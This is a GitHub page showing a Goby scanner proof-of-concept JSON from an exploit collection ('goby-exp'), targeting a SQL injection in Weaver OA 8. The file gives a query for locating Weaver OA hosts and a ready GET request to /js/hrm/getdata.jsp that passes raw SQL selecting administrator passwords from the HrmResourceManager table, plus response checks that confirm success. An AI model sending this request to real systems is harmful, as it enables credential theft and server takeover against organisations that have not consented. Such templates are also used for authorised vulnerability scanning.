forked from k3vi-07/goby-exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathWeaver_OA_8_SQL_injection.json
67 lines (67 loc) · 2.62 KB
/
Weaver_OA_8_SQL_injection.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
{
"Name": "Weaver OA 8 SQL injection",
"Level": "2",
"Tags": [
"SQL Injection"
],
"GobyQuery": "app=\"Weaver-OA\"",
"Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges",
"Product": "Weaver OA 8",
"Homepage": "https://www.weaver.com.cn/",
"Author": "PeiQi",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "404 Not Found",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "<html>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "script",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-10 08:00:20",
"GobyVersion": "1.8.255"
}